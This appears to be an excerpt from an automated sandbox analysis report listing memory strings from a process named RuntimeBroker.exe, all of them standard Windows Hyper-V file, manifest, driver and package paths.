Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\vmbkmcl.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mC:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\Hyper-V.sch
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\r\vmdebug.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_4bf902d1685e1d06\MSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_62d29611d5954e4f\Hyper-V.Format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-h..r-merged-deployment_31bf3856ad364e35_10.0.19041.1_none_479626a02c4fee1b.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0\WindowsHyperVCluster.V2.mfl
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_e16d8a57f6edf359.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\hvax64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\hvservice.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1566.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\vmbkmcl.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\servicing\Packages\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981\VmSynthFcVdev.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\hvloader.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\vsconfig.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\WindowsHyperVClusterUninstall.mof
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\f\vmdebug.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\vhdparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\vmbkmclr.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\f\vmwp.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de\vmswitch.sys.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164\wshhyperv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\WindowsVirtualization.V2.mfl
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\vmsmb.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\vmusrv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\vmbkmclr.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\Hyper-VReplicaMetadata_v1.xsd
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\virtmgmt.msc
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\f\pvhdparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3\ramparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_6d27406409f6104a\Hyper-V.Types.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\vmswitch.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\vfpext.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda\vmdebug.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_564dad239cbedf01\MSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\vmusrv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.19041.928_none_58e4b5397f9ab13a.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.19041.1_none_cce38a03f1e40067.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\nvspinfo.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_1ce7d3781003c70f\Hyper-V.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.19041.928_none_b394b845725c83f9.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\f\VmEmulatedStorage.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-guest-network-drivers_31bf3856ad364e35_10.0.19041.1_none_2cfac380b9544760.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\vfpapi.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\vmrdvcore.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mC:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\winhv.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Disabled-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\f\vid.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\WindowsHyperVCluster.V2.mof
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lC:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventVmNetworkAdatper.cdxml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\r\HyperVSysprepProvider.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\vmbkmclr.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8\vid.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\VmsProxy.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\vmsmb.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\lunparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06\RemoteFileBrowse.dll.mui
